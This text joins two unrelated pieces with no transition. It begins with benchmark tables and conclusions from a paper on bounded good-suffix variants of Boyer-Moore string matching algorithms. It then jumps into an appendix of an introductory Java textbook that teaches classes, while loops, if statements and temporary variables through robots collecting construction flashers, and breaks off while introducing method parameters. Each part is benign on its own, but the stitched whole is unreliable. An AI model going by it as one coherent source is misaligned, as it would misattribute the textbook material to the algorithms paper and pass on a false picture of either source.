</tr>
<tr>
<td>$\beta$BM</td>
<td>47.34</td>
<td>40.33</td>
<td>31.94</td>
<td>26.10</td>
<td>21.64</td>
<td>20.24</td>
<td>19.82</td>
<td>17.95</td>
<td>15.93</td>
</tr>
<tr>
<td><strong>FS</strong></td>
<td>35.62</td>
<td>31.28</td>
<td>25.80</td>
<td>21.93</td>
<td>19.28</td>
<td>18.33</td>
<td>17.91</td>
<td>16.48</td>
<td>14.96</td>
</tr>
<tr>
<td>$\beta$FS</td>
<td>36.32</td>
<td>32.34</td>
<td>26.36</td>
<td>22.46</td>
<td>19.37</td>
<td>18.35</td>
<td>17.94</td>
<td>16.71</td>
<td>14.95</td>
</tr>
<tr>
<td><strong>FFS</strong></td>
<td>31.02</td>
<td>28.39</td>
<td>23.46</td>
<td>19.76</td>
<td>17.83</td>
<td>16.97</td>
<td>16.64</td>
<td>15.03</td>
<td>13.78</td>
</tr>
<tr>
<td>$\beta$FFS</td>
<td>37.27</td>
<td>32.44</td>
<td>25.83</td>
<td>21.71</td>
<td>19.30</td>
<td>18.53</td>
<td>18.18</td>
<td>16.33</td>
<td>14.95</td>
</tr>
</tbody>
</table>
Running times in hundredths of seconds for a Rand2 problem
<table>
<thead>
<tr>
<th>$\sigma = 4$</th>
<th>2</th>
<th>4</th>
<th>6</th>
<th>8</th>
<th>10</th>
<th>20</th>
<th>40</th>
<th>80</th>
<th>160</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>BM</strong></td>
<td>38.84</td>
<td>28.41</td>
<td>23.23</td>
<td>21.04</td>
<td>20.15</td>
<td>19.30</td>
<td>18.95</td>
<td>17.70</td>
<td>16.42</td>
</tr>
<tr>
<td>$\beta$BM</td>
<td>39.09</td>
<td>28.58</td>
<td>23.35</td>
<td>21.29</td>
<td>20.30</td>
<td>19.54</td>
<td>19.10</td>
<td>17.87</td>
<td>16.52</td>
</tr>
<tr>
<td><strong>FS</strong></td>
<td>26.08</td>
<td>21.15</td>
<td>18.95</td>
<td>18.14</td>
<td>17.64</td>
<td>17.07</td>
<td>16.70</td>
<td>15.91</td>
<td>14.84</td>
</tr>
<tr>
<td>$\beta$FS</td>
<td>26.56</td>
<td>21.49</td>
<td>19.17</td>
<td>18.30</td>
<td>17.65</td>
<td>17.12</td>
<td>16.72</td>
<td>16.02</td>
<td>14.93</td>
</tr>
<tr>
<td>$\beta$FFS</td>
<td>26.61</td>
<td>21.18</td>
<td>18.68</td>
<td>17.66</td>
<td>16.70</td>
<td>16.30</td>
<td>16.02</td>
<td>14.55</td>
<td>13.35</td>
</tr>
</tbody>
</table>
Running times in hundredths of seconds for a Rand4 problem
<table>
<thead>
<tr>
<th>$\sigma = 8$</th>
<th>2</th>
<th>4</th>
<th>6</th>
<th>8</th>
<th>10</th>
<th>20</th>
<th>40</th>
<th>80</th>
<th>160</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>BM</strong></td>
<td>33.24</td>
<td>23.16</td>
<td>18.97</td>
<td>17.86</td>
<td>17.36</td>
<td>17.12</td>
<td>17.00</td>
<td>16.42</td>
<td>15.83</td>
</tr>
<tr>
<td>$\beta$BM</td>
<td>33.01</td>
<td>23.09</td>
<td>19.14</td>
<td>17.93</td>
<td>17.36</td>
<td>17.14</td>
<td>17.09</td>
<td>16.47</td>
<td>15.91</td>
</tr>
<tr>
<td><strong>FS</strong></td>
<td>21.02</td>
<td>18.26</td>
<td>16.43</td>
<td>16.04</td>
<td>15.93</td>
<td>15.81</td>
<td>15.82</td>
<td>15.29</td>
<td>14.88</td>
</tr>
<tr>
<td>$\beta$FS</td>
<td>21.32</td>
<td>18.34</td>
<td>16.46</td>
<td>16.10</td>
<td>15.96</td>
<td>15.88</td>
<td>15.75</td>
<td>15.39</td>
<td>14.91</td>
</tr>
<tr>
<td><strong>FFS</strong></td>
<td>20.84</td>
<td>18.23</td>
<td>16.39</td>
<td>16.05</td>
<td>15.78</td>
<td>15.64</td>
<td>15.26</td>
<td>13.96</td>
<td>13.18</td>
</tr>
<tr>
<td>$\beta$FFS</td>
<td>21.12</td>
<td>18.36</td>
<td>16.43</td>
<td>16.05</td>
<td>15.82</td>
<td>15.67</td>
<td>15.31</td>
<td>14.00</td>
<td>13.02</td>
</tr>
</tbody>
</table>
Running times in hundredths of seconds for a Rand8 problem
The above experimental results show that the algorithms $\beta$BM, $\beta$FS, and $\beta$FFS have much the same running times as the algorithms BM, FS, and FFS. Only when the size of the alphabet is 2 do the “bounded” versions perform slightly worse than their counterparts, especially for short patterns. On the other hand, as the sizes of the alphabet and of the pattern increase, the “bounded” versions often moderately outperform their counterparts. This behavior is most noticeable in the case of the \textit{Forward-Fast-Search} algorithm and in the real data problems. The latter remark shows that our simplifying hypotheses in the analysis put forward in Section 4 do not lead to unrealistic results.
6 Conclusions
Space and time economy are essential features of any practical algorithm. However, they are often sacrificed in favor of asymptotic efficiency. This is the case for most practical string matching algorithms, which show a sublinear behavior in practice at the price of using extra memory of non-constant size to maintain auxiliary information. The \textit{Boyer-Moore} algorithm, for instance, requires additional $O(m)$- and $O(|\Sigma|)$-space to compute the tables relative to the good-suffix and bad-character heuristics, respectively.
In this paper we have presented a practical modification of the good-suffix heuristic, called the bounded good-suffix heuristic, which can be computed in $O(m)$-time and requires only constant extra space.
Through an extensive collection of experimental tests on the \textit{Boyer-Moore} algorithm and two of its most efficient variants (namely the algorithms \textit{Fast-Search} and \textit{Forward-Fast-Search}) we have shown that the “bounded” versions are comparable with, and often outperform, their counterparts.
We are currently investigating the problem of finding an effective string matching algorithm which requires only extra constant space. To this purpose, we expect that the bad-character heuristic (which needs $O(|\Sigma|)$-space) needs to be dropped and substituted by a heuristic of a different kind.
Appendix F can be used to either look ahead to what you will be learning, or as a review for what you have learned. This appendix provides a view of the lay of the land. It’s like standing on a high hill at the beginning of a hike to see what kind of interesting places lie ahead – or surveying the view at the end of the hike to see where you’ve been.
If you are at the beginning of your hike and looking ahead, this appendix gives a glimpse of nine interesting places in the journey to becoming an object-oriented programmer. By getting an early view of them, you will know a little bit of what is to come, and be better able to integrate what you are learning into a cohesive whole. And, as any hiker knows, trudging up a mountain is easier if you can look forward to what lies at the top and on the other side. Obviously, there will be lots of details clarified later.
If you are at the end of your hike and looking backwards, this appendix can help you remember where you’ve been and what you’ve learned. It could be used, for example, as part of your review before an exam.
Chapter Objectives
- To see how to extend classes with new services.
- To see how to perform a task repeatedly.
- To see how programs can decide whether to take an action.
- To see how to remember information temporarily.
- To see how to make services more flexible by receiving information when they are executed.
- To see how to interact with the program’s user.
- To see how to remember information for an object’s lifetime.
- To see how to send the same message to different kinds of objects, with each object behaving in a way appropriate for itself.
- To see how to gather similar information together with a collection.
F.1 Extending an Existing Class
Suppose that karel is working for a construction company that is paving several streets running east and west. At each end of the construction site are walls, blocking traffic from using the streets. Traffic continues to cross the construction site on the avenues, however. To warn the cross-traffic to slow down, flashers are placed on each intersection every night. karel, jasmine, and pat have the job of collecting them again in the morning. One robot begins on the west end of each street being paved. They each proceed to the east end, collecting the flashers along the way. When they have collected them all, they turn around. Their initial and final situations are shown in Figure F-1 and Figure F-2.
The flashers shown in Figure F-1 are special kinds of Thing objects that have a special appearance. They also have two additional services, one to turn on the flashing light and another to turn it off.
F.1.1 Using Existing Techniques
Solving this problem is not difficult, but it is long and repetitive. The program has six lines of code placing walls, and twelve placing flashers. The instructions to each robot are nine lines long, and are repeated three times, once for each robot. Each set of instructions is the same except for the name of the robot. Much of the program is shown in Listing F-1. Some repetitive lines are omitted.
One of the primary tasks of programming is to find better abstractions for programs such as these, so they become easier to read, write, and understand.
Listing F-1: A long, repetitive program for collecting the flashers. Some repetitive lines are omitted.

```java
import becker.robots.*;

public class Main extends Object {
    public static void main(String[] args) {
        City site = new City();
        Wall detour0 = new Wall(site, 0, 1, Directions.EAST);
        Wall detour1 = new Wall(site, 0, 2, Directions.EAST);
        Wall detour2 = new Wall(site, 0, 3, Directions.EAST);
        Wall detour3 = new Wall(site, 5, 1, Directions.WEST);
        Wall detour4 = new Wall(site, 5, 2, Directions.WEST);
        Wall detour5 = new Wall(site, 5, 3, Directions.WEST);

        Flasher flash00 = new Flasher(site, 1, 1, true);
        Flasher flash01 = new Flasher(site, 2, 1, true);
        Flasher flash02 = new Flasher(site, 3, 1, true);
        Flasher flash03 = new Flasher(site, 4, 1, true);
        Flasher flash04 = new Flasher(site, 1, 2, true);
        // ... remaining flashers omitted ...

        Robot karel = new Robot(site, 1, 1, Directions.EAST);
        Robot jasmine = new Robot(site, 1, 2, Directions.EAST);
        Robot pat = new Robot(site, 1, 3, Directions.EAST);
        CityFrame frame = new CityFrame(site, 6, 5);

        karel.pickThing();
        karel.move();
        karel.pickThing();
        karel.move();
        karel.pickThing();
        karel.move();
        karel.pickThing();
        karel.turnLeft();
        karel.turnLeft();

        jasmine.pickThing();
        jasmine.move();
        // ... repetitive lines omitted ...
        jasmine.turnLeft();
        jasmine.turnLeft();

        pat.pickThing();
        pat.move();
        // ... repetitive lines omitted ...
        pat.turnLeft();
        pat.turnLeft();
    }
}
```
F.1.2 Creating A New Kind of Robot
This program would be so much easier to understand if the robots could do more than just pick things up, move, turn left, and put things down. For example, what if we had a new kind of robot that can also collect a row of flashers, and turn around? With this new kind of robot, nine lines of instruction for each robot could be reduced to two:
```java
karel.collectFlashers();
karel.turnAround();
```
Besides making the main program shorter and easier to understand, defining a new kind of robot also allows us to reuse code. Not only can karel use these two services, but so can jasmine and pat.
We can and should create a new kind of robot with new services whenever a complex task has distinct parts or the same task is performed several times, either by the same robot or several robots.
Listing F-2 shows how to define a new kind of robot named Collector with two new services: collectFlashers, and turnAround. This code should be in its own file, named Collector.java.
Each of the two new services, defined in lines 9-18 and 20-24, follow a regular pattern: the keywords `public` and `void` are followed by the name of the service and a pair of parentheses. After this, between `{` and `}`, are the instructions that tell the robot how to carry out the new command.
When a robot named karel is told to move, we name the robot and then tell it to move – for example, karel.move(). This approach doesn’t work inside a new kind of robot like Collector, because we don’t know what the robot will be named. It could be named karel, jasmine, pat, or something else. So we tell “this robot” to move by writing this.move().
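The mechanics of `this` inside a new kind of robot can be seen without the robot library. Here is a minimal, self-contained sketch; the `Robot` base class below is a hypothetical stand-in that only counts moves, not the real becker.robots class:

```java
// Hypothetical stand-in for the library's Robot class -- it only counts moves.
class Robot {
    private int moves = 0;
    public void move() { this.moves++; }
    public int movesMade() { return this.moves; }
}

// A new kind of robot with a new service built from inherited ones.
class Collector extends Robot {
    public void moveTwice() {
        // "this" means "whichever Collector received the message",
        // so the same code works for karel, jasmine, or pat.
        this.move();
        this.move();
    }
}

public class ThisDemo {
    public static void main(String[] args) {
        Collector karel = new Collector();
        Collector jasmine = new Collector();
        karel.moveTwice();
        System.out.println(karel.movesMade());   // prints 2
        System.out.println(jasmine.movesMade()); // prints 0
    }
}
```

Note that telling karel to `moveTwice` does not affect jasmine: `this` always refers to the one object that received the message.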
The name of the class, Collector, must be used to construct these new kinds of robots. Replace lines 31, 32, and 33 in Listing F-1 with
```java
Collector karel = new Collector(site, 1, 1, Directions.EAST);
Collector jasmine = new Collector(site, 1, 2, Directions.EAST);
Collector pat = new Collector(site, 1, 3, Directions.EAST);
```
karel, jasmine and pat have all the capabilities of ordinary robots. They can move, turn left, pick things up, and put things down. They can also collect a row of four flashers and turn around, thanks to the definitions contained in Listing F-2. And so, we can replace lines 39 to 47 in Listing F-1 with just two lines:
karel.collectFlashers();
karel.turnAround();
A similar replacement can be made for jasmine and pat.
Listing F-2: The definition of a new kind of robot that has two new services for collecting flashers and turning around.
```java
import becker.robots.*;

public class Collector extends Robot {
    public Collector(City city, int ave, int str, int dir) {
        super(city, ave, str, dir);
    }

    // Collect a row of four flashers
    public void collectFlashers() {
        this.pickThing();
        this.move();
        this.pickThing();
        this.move();
        this.pickThing();
        this.move();
        this.pickThing();
    }

    // Turn around and face the opposite direction
    public void turnAround() {
        this.turnLeft();
        this.turnLeft();
    }
}
```
F.1.3 Creating Other New Kinds of Robots
Looking back to Chapter 1, we could have used new kinds of robots many times. In one end-of-chapter problem the robot moved around a square. It could have used a new service named moveAlongSide. The robot in many of the problems could have used a new service named turnRight, and in another problem two different robots could have each used move3. In each of these situations, one or more robots performed the same sequence of instructions several times, or a complicated action could have been broken down into several steps.
New kinds of robots, customized for these situations, can be defined with the template shown in Listing F-3. Most of the code is the same for every new kind of robot. You need to replace «className» and «newService» to customize the template for your unique needs. «className» follows the rules for class names that we learned in Chapter 1. Use the same name in both places that «className» appears.
Listing F-3: A template for creating a new kind of robot with a new service. Additional services may also be added.
```java
import becker.robots.*;

public class «className» extends Robot {
    public «className»(City city, int ave, int str, int dir) {
        super(city, ave, str, dir);
    }

    «newService»
}
```
In fact, this same technique can also be used to create a new kind of city that has new services to place walls and flashers for the construction site. The new kind of city might be called a ConSite, short for “construction site.” It has two new services, one for placing barriers (walls) and another for placing flashers.

Using a ConSite city and Collector robots significantly shortens our main program, making it easier to read and understand. The revised program is shown in Listing F-4. This program behaves exactly the same as the 69-line program shown in Listing F-1, but is much simpler and easier to read.
Listing F-4: A new version of the program using a new kind of robot and a new kind of city.
```java
import becker.robots.*;

public class NewMain extends Object {
    public static void main(String[] args) {
        ConSite site = new ConSite();
        site.placeBarriers();
        site.placeFlashers();

        Collector karel = new Collector(site, 1, 1, Directions.EAST);
        Collector jasmine = new Collector(site, 1, 2, Directions.EAST);
        Collector pat = new Collector(site, 1, 3, Directions.EAST);
        CityFrame frame = new CityFrame(site, 6, 5);

        karel.collectFlashers();
        karel.turnAround();
        jasmine.collectFlashers();
        jasmine.turnAround();
        pat.collectFlashers();
        pat.turnAround();
    }
}
```
F.2 Repeating Statements
The paving project where karel, jasmine, and pat work has been progressing smoothly. However, an influential resident on jasmine’s street has convinced city council to pave one extra block of that street. To offset the cost, only two blocks of pat’s street will be paved. The new situation is shown in Figure F-3.
Now we have a problem – we apparently need three different kinds of robots. karel, the top robot in Figure F-3, can still be a Collector, as we defined in Listing F-2. jasmine, the middle robot, must collect the flasher from an extra intersection. pat, the bottom robot, will malfunction unless we instruct it to collect flashers from only three intersections rather than four.
Creating three different kinds of robots that do almost the same task is a poor solution. Fortunately, there is a better way. We know that each robot has completed its task when it reaches the wall at the opposite end of the street. In between the starting position and that wall, each robot does the same steps over and over: collect a flasher, and move to the next intersection.
If we can define the Collector robots this way, then karel, jasmine, and pat can all be the same kind of robot. Java’s while statement can be used to repeat statements over and over. The while statement can be used whenever a task is composed of identical steps that are repeated until the task is done. In this case, the identical steps are collecting a flasher and moving to the next intersection. These steps are repeated until the opposite wall is reached. Using this algorithm, each of the three robots will perform correctly even though they are collecting flashers on different lengths of street.
A version of collectFlashers that uses this idea is shown in Listing F-5. The while statement extends from line 11 to line 14 and consists of three parts.
- The keyword while signals to Java that something is going to be repeated.
- The condition determines if the statements should be repeated again. In this example, the condition is (this.frontIsClear()) – is this robot’s front clear of anything that can prevent it from moving (like a wall)?
- The body of the while statement, the part between { and }, is the code that is repeated.
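The same three parts appear in any Java `while` loop. As a self-contained sketch, the robot's wall sensor can be faked with a plain counter — `distanceToWall` below is an invented stand-in for `frontIsClear()`:

```java
public class WhileParts {
    // Returns how many flashers get collected when the robot starts
    // distanceToWall intersections away from the wall.
    static int collect(int distanceToWall) {
        int collected = 0;
        while (distanceToWall > 0) { // keyword + condition
            collected++;             // body: pick up a flasher...
            distanceToWall--;        // ...and move one intersection
        }
        collected++;                 // the intersection at the wall, after the loop
        return collected;
    }

    public static void main(String[] args) {
        // The same code handles streets of different lengths, which is
        // exactly why karel, jasmine, and pat can all share it.
        System.out.println(collect(3)); // prints 4
        System.out.println(collect(1)); // prints 2
    }
}
```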
Listing F-5: The Collector class, defined with a while loop in collectFlashers.
```java
import becker.robots.*;

public class Collector extends Robot {
    public Collector(City city, int ave, int str, int dir) {
        super(city, ave, str, dir);
    }

    // Collect flashers as long as the front of the robot is not blocked.
    public void collectFlashers() {
        while (this.frontIsClear()) {
            this.pickThing();
            this.move();
        }
        this.pickThing();
    }

    // Turn around and face the opposite direction
    public void turnAround() {
        this.turnLeft();
        this.turnLeft();
    }
}
```
Many tasks do the same steps over and over, until the task is finished.
Find The Code: layofland/repetition
How does this while loop work? When a robot is told to collect flashers, the while loop first checks if the robot’s front is clear. That is, it checks if it is blocked from moving forwards. If its front is clear, then it does everything in the braces at lines 12-14. After it picks up a flasher and moves to the next intersection, execution returns to line 11. The robot again checks if its front is clear. If it is, everything in the braces is executed. This keeps happening – check if the front is clear, and if it is, do everything in the braces – until the front is not clear. Then execution resumes at line 15 – the line following the while loop’s closing brace. Figure F-4 illustrates this process.
Figure F-4: Illustrating the execution of a while loop. The dark lines in the code indicate the statements that are executed to arrive at the situation shown on the right.
```java
while (this.frontIsClear())
{   this.pickThing();
    this.move();
}
this.pickThing();
```
The while loop contains one `pickThing` instruction and one `move` instruction, so the robot will always pick something up just as often as it moves. However, the initial situation shows that it needs to move twice but pick up three flashers. Thus, there must be one `pickThing` instruction after the loop to ensure that the extra flasher is picked up.
A `while` loop is useful to repeat some code over and over. In this example, the repeated code picked something up and moved. A robot could also use a `while` loop to move until a streetlight is encountered, to pick up all the flashers on a corner, to turn left until its front is clear, and so on.
### F.3 Making Decisions
Work has been proceeding nicely on the construction site. *karel, jasmine, and pat* are still collecting the flashers every morning. One morning, however, they were unable to complete their jobs. It appears that several flashers were stolen during the night. The robots malfunctioned when they reached the empty intersections and tried to pick up the missing flashers. The construction project is already over budget, and so the decision has been made to distribute the eight remaining flashers randomly on the intersections.
Figure F-5 shows just two of the many possible initial situations. As you can see, the robots can no longer automatically try to pick up a flasher from every intersection. They must be reprogrammed to first check if a flasher is present.
A robot may need to make decisions in other contexts, as well. It may need to detect whether its way is blocked by a wall. If so, turn. It may need to check whether it is facing south, and if it is, turn around. It may need to check whether there are enough things in its backpack to carry out a job. If not, go to a supply depot and get some more.
In each of these contexts, the robot should use an `if` statement. An `if` statement tests a condition. If the condition is true, some additional code is executed. If the condition is false, the additional code is skipped. For example, in the statement `if (karel.isBesideThing()) { karel.pickThing(); }`, the additional code is `karel.pickThing()` and the condition is `karel.isBesideThing()`. If the condition is true – `karel` is, in fact, beside a `Thing` (a flasher) – then the additional code is executed and the thing is picked up. If `karel` is not beside a `Thing`, then `karel` won’t even try to pick something up.
Figures F-6 and F-7 show two different initial situations and how `karel` behaves when the code shown is executed. In each case, arrows show how execution proceeds through the code.
Now, we need to apply this knowledge to keep `karel`, `jasmine`, and `pat` from malfunctioning when they do their jobs. The code we need to fix is the `collectFlashers` service in Listing F-5. Each use of `this.pickThing()` must be replaced with three lines:
```java
if (this.isBesideThing()) {
    this.pickThing();
}
```
We again use this instead of a robot’s name because we are defining a new kind of robot that might be given the name karel, jasmine, pat – or a completely new name.
Checking whether or not a robot is beside a thing is just one use of the if statement. It is useful in many situations, wherever a program must determine whether or not some code should be executed. Use it to test whether or not a robot should pick something up, or whether or not something should be put down. Eventually, we will use the if statement to test whether or not a credit card’s balance is low enough to make a debit, or whether or not a name is too long to print in the allotted space, to give just a few examples.
The if statement and the while statement are sometimes confused by beginning programmers. Both include a test, but they are used for fundamentally different things. A while statement tests if code should be executed again. The code in the braces might be executed many, many times. An if statement tests whether to execute code exactly once or not at all.
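That distinction can be made concrete with two small counters. This sketch is plain Java, independent of the robot classes:

```java
public class IfVsWhile {
    // An "if" tests once: its body runs once or not at all.
    static int ifBodyRuns(int n) {
        int runs = 0;
        if (n > 0) {
            runs++;
        }
        return runs;
    }

    // A "while" re-tests after every pass: its body may run many times.
    static int whileBodyRuns(int n) {
        int runs = 0;
        while (n > 0) {
            runs++;
            n--;
        }
        return runs;
    }

    public static void main(String[] args) {
        System.out.println(ifBodyRuns(3));    // prints 1
        System.out.println(whileBodyRuns(3)); // prints 3
    }
}
```

With the same starting value, the `if` body runs at most once while the `while` body runs until its condition becomes false.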
F.3.1 Testing for Specific Kinds of Things
The test for being beside a Thing is very general. Flashers are Things, but so are ordinary Things! In addition, the techniques we used in Section F.1 to extend the Robot class can also be used to create new kinds of Things.
What if some other kinds of Things are on the construction site? For example, suppose one of the intersections has a “tool” (represented by a Thing), but no flasher. Then, when karel comes to that intersection, karel first tests if it is beside a Thing. The “tool” will cause the condition to be true, and karel will pick it up.
To solve this problem, we can write
```java
if (this.isBesideThing(Predicate.aFlasher)) {
    this.pickThing(Predicate.aFlasher);
}
```
The new part, Predicate.aFlasher, tells isBesideThing and pickThing that we are only interested in Things that happen to be Flashers. isBesideThing should only test if the robot is beside a Flasher, and pickThing should only attempt to pick up Flashers. This restriction to Flashers only applies to the isBesideThing and pickThing where Predicate.aFlasher is included. It is not “remembered” for the next time.
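The `Predicate.aFlasher` filter is specific to the robot library, but the underlying idea — testing whether an object is of a more specific kind — can be mimicked in plain Java with `instanceof`. The `Thing` and `Flasher` classes below are invented for illustration:

```java
class Thing {}                  // an ordinary thing, such as a tool
class Flasher extends Thing {}  // a special kind of Thing

public class KindTest {
    // Only "pick up" objects that are actually flashers.
    static boolean shouldPick(Thing t) {
        return t instanceof Flasher;
    }

    public static void main(String[] args) {
        System.out.println(shouldPick(new Flasher())); // prints true
        System.out.println(shouldPick(new Thing()));   // prints false
    }
}
```

A tool left on an intersection fails the `instanceof Flasher` test, just as it fails the `Predicate.aFlasher` test in the robot library.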
F.3.2 Helper Methods
The part of `collectFlashers` that picks flashers up is becoming more complicated. It now includes a test to check whether the robot is actually beside a `Thing`, and whether that `Thing` is, in fact, a flasher. Replacing the simple statement `this.pickThing()` in Listing F-5 with the three lines shown above obscures the logic of the while loop.
One way to make `collectFlashers` easier to understand is to create another service to handle the complexity of picking up a flasher. This new service might be named `pickFlasherIfPresent`. Services that exist just to simplify another method are sometimes called helper methods.
Listing F-6 shows a version of the `Collector` class that defines `pickFlasherIfPresent`. `collectFlashers` uses the method with the statement
```java
this.pickFlasherIfPresent();
```
By defining and using this helper method, the intricacies of picking up a flasher only need to be written once instead of twice (once in the while loop and once more right after the loop). It also retains the original simplicity of the `collectFlashers` method.
Listing F-6: One method, `pickFlasherIfPresent`, can help another method, `collectFlashers`, carry out its task.
```java
import becker.robots.*;

public class Collector extends Robot {
    public Collector(City city, int ave, int str, int dir) {
        super(city, ave, str, dir);
    }

    // Collect flashers as long as the front of the robot is not blocked.
    public void collectFlashers() {
        while (this.frontIsClear()) {
            this.pickFlasherIfPresent();
            this.move();
        }
        this.pickFlasherIfPresent();
    }

    // Pick up a flasher, if one is present on the current intersection.
    public void pickFlasherIfPresent() {
        if (this.isBesideThing(Predicate.aFlasher)) {
            this.pickThing(Predicate.aFlasher);
        }
    }

    // remainder of class omitted
}
```
F.4 Temporary Memory
The city’s public works department has taken the walls from the paving project to another work site. The new situation is shown in Figure F-8.
This presents a problem. karel, jasmine, and pat had been using the walls to determine when to stop collecting flashers. Without the walls, they will keep going east. At each intersection they will check for a flasher. Not finding one, they will go to the next intersection and check again – forever.
One possible solution is for each robot to count the number of moves it makes. Each robot should move four times, attempting to collect a flasher before each move. Then, collect the last flasher (if there is one) and turn around. A significant disadvantage of this plan is that karel and pat will have to travel farther than before. We will simply accept that limitation for now.
To make this plan work, each robot will need to remember how many moves it has made while it is collecting flashers. Java provides variables to store or remember information. A variable is like a box with a name. Each variable stores a piece of information; in this case, a number. The number can be replaced by a new number at any time.
The following code creates a new variable named numMoves and stores a number, zero, in it.
```java
int numMoves = 0;
```
A different number, in this case five, can be stored in numMoves like this:
```java
numMoves = 5;
```
Notice that `int` is only used the first time, when the variable is created. `int` indicates that the variable will store an integer, a certain kind of number.
We can also use variables to calculate new values. For example,
```java
int a = 0;
a = numMoves + 1;
```
will first create a new variable named “a”. In the next line, Java will first get the number stored in `numMoves` (5) and add 1 to it, obtaining 6. This new number is then put into the variable `a`, replacing the number that was there. The variable on the left side of the equals sign is forced to have the value calculated on the right side of the equals sign.
We can also use the same variable on both the left and the right side of the equals sign. For example,
```java
numMoves = numMoves + 1;
```
gets the current number stored in `numMoves` (5) and adds 1 to it. This new number, 6, is then stored in the variable named on the left side of the equals sign. That is, `numMoves` is now one larger than it used to be. This is the fundamental step in counting – remembering a number one larger than the previous number.
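Because the right-hand side is evaluated before the store, this pattern behaves predictably no matter how many times it repeats. A short runnable check:

```java
public class CountingStep {
    public static void main(String[] args) {
        int numMoves = 5;
        numMoves = numMoves + 1;      // read 5, add 1, store 6 back
        System.out.println(numMoves); // prints 6

        // Repeating the statement counts one more each time.
        numMoves = numMoves + 1;
        numMoves = numMoves + 1;
        System.out.println(numMoves); // prints 8
    }
}
```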
Now, we can combine counting with a `while` loop to move a robot four times, a slight simplification of collecting flashers.
```java
public void move4() {
    int numMoves = 0;
    while (numMoves < 4) {
        this.move();
        numMoves = numMoves + 1;
    }
}
```
Figure F-9 illustrates how this code is executed. It begins by creating a variable, `numMoves`, to store the number of moves the robot has made so far. The robot hasn’t moved yet, so the first value stored is zero. The test in the `while` loop, `numMoves < 4`, checks to see if the loop should continue. If the number of moves made so far, `numMoves`, is less than four, the two statements between the braces are executed. Otherwise, the loop ends. Inside the loop, the robot is told to move and the number of moves is incremented by 1. A `while` loop used in this way is sometimes called a “counted while loop.”
This particular `while` loop executes the `move` instruction four times, but it compares `numMoves` to 4 a total of five times. In Figure F-9, every time an arrow points to the line `while (numMoves < 4)` the comparison is made. The first four times it is true that `numMoves` is less than 4. The last time, however, `numMoves` has the value 4, and the loop ends.
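The four-moves, five-comparisons behavior can be checked with an ordinary Java loop in which a counter stands in for the robot's move. This class is my own sketch, not part of the robot library:

```java
public class LoopTrace {
    // Simulate the counted while loop, recording body executions and test evaluations.
    public static int[] trace(int limit) {
        int numMoves = 0;
        int comparisons = 0;
        while (true) {
            comparisons = comparisons + 1;   // the while test is evaluated
            if (!(numMoves < limit)) {
                break;                       // test is false: the loop ends
            }
            numMoves = numMoves + 1;         // stands in for this.move()
        }
        return new int[] { numMoves, comparisons };
    }

    public static void main(String[] args) {
        int[] result = trace(4);
        System.out.println("moves=" + result[0] + ", comparisons=" + result[1]);
    }
}
```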
To solve the flasher collection problem for karel, jasmine, and pat, the code shown in Figure F-9 must also pick up a flasher, if one is present, just before the robot moves, and again after the loop exits. This change is shown in Listing F-7. This version of collectFlashers always moves four times and checks five intersections for flashers. To understand why, look again at Figure F-9: the robot moves four times but visits five intersections.
Listing F-7: A version of collectFlashers that always checks exactly five intersections.
```java
public void collectFlashers()
{
int numMoves = 0;
while (numMoves < 4)
{
this.pickFlasherIfPresent();
this.move();
numMoves = numMoves + 1;
}
this.pickFlasherIfPresent();
}
```
When a variable is defined inside a method it is called a temporary variable. It may be used only within the method while the method is executing. When the method is finished, the temporary variable and the information it contains are discarded.
A temporary variable may be used to control a while loop any time you know how many times a set of steps should be repeated. This is quite different from the way the while loop was used in Section F-2. There the steps were repeated over and over until the task was done. We didn’t know, when we started out, how many times the loop would repeat before we reached a wall and stopped.
Examples that effectively combine a temporary variable with a while loop include:
- moving a robot around the four sides of a square,
- picking up exactly 100 flashers,
- running 10 laps around a track,
- counting the number of things on an intersection, then replacing half of them.
In each example, a set of steps is repeated a known number of times.
The last example is interesting because it uses two loops, with the information gathered in the first used to control the second. Listing F-8 shows one way to solve the problem:
Temporary variables are discarded when the method containing them is finished executing.
Use a counted loop when the number of repetitions is known in advance.
Listing F-8: Picking up half of the things on an intersection.
```java
public void pickHalf()
{
int numThingsFound = 0;
while (this.isBesideThing())
{
this.pickThing();
numThingsFound = numThingsFound + 1;
}
int numPutBack = 0;
while (numPutBack < numThingsFound/2)
{
this.putThing();
numPutBack = numPutBack + 1;
}
}
```
The first loop is not a counted loop. We don't know in advance how many times it will execute. Rather, it repeats while there is still something on the intersection, counting the number of things it picks up. This count is kept in a temporary variable named `numThingsFound`.
The second loop is a counted loop. It divides the number of things found by 2 to calculate how many times to execute. As long as `numPutBack` is less than this number, another thing is put down and the count of things put down is incremented by one.
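The same two-loop pattern can be sketched without robots: a first loop counts items as they are "picked up", then a counted loop "puts back" half of them. The names below are mine:

```java
public class PickHalf {
    // Pick up everything, then put back half (integer division rounds down).
    public static int numPutBack(int thingsOnIntersection) {
        int remaining = thingsOnIntersection;
        int numThingsFound = 0;
        while (remaining > 0) {            // like this.isBesideThing()
            remaining = remaining - 1;     // like this.pickThing()
            numThingsFound = numThingsFound + 1;
        }
        int numPutBack = 0;
        while (numPutBack < numThingsFound / 2) {
            numPutBack = numPutBack + 1;   // like this.putThing()
        }
        return numPutBack;
    }
}
```

With 7 things found, 7 / 2 is 3 in integer arithmetic, so 3 things are put back.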
Remembering information temporarily in a variable is useful beyond controlling loops. In the last example, the robot remembered how many things were on the intersection so it could put back half of them. It might remember which avenue and street it was on before beginning a task so it can return there when it’s done, or the direction it’s facing so it can turn that way again.
**F.5 More Flexible Methods**
The manager of the construction company has become concerned about the solution just implemented. Recall that when the walls were in place, `karel`, `jasmine`, and `pat` each traveled only as far as needed to collect the flashers on their assigned street. Now, each robot checks five intersections even though `karel` is on a street where only four need to be checked, and `pat` really only needs to check 3 intersections. The manager is concerned that `karel` and `pat` will wear out faster than necessary. She would like a way to tell each robot how many intersections to check for flashers.
What the manager wants is a more flexible version of the service developed in the previous section. There, we developed a service that always moved four times, checking a total of five intersections for flashers to collect. Instead of always checking five intersections, the manager should be able to
tell each robot how many intersections to check. This would be done in the main method. In Listing F-4 we wrote
```java
16 karel.collectFlashers();
17 karel.turnAround();
18
19 jasmine.collectFlashers();
20 jasmine.turnAround();
21
22 pat.collectFlashers();
23 pat.turnAround();
```
We would like to replace these lines with statements that specify the number of intersections the robot should check. For example,
```java
16 karel.collectFlashers(4);
17 karel.turnAround();
18
19 jasmine.collectFlashers(5);
20 jasmine.turnAround();
21
22 pat.collectFlashers(3);
23 pat.turnAround();
```
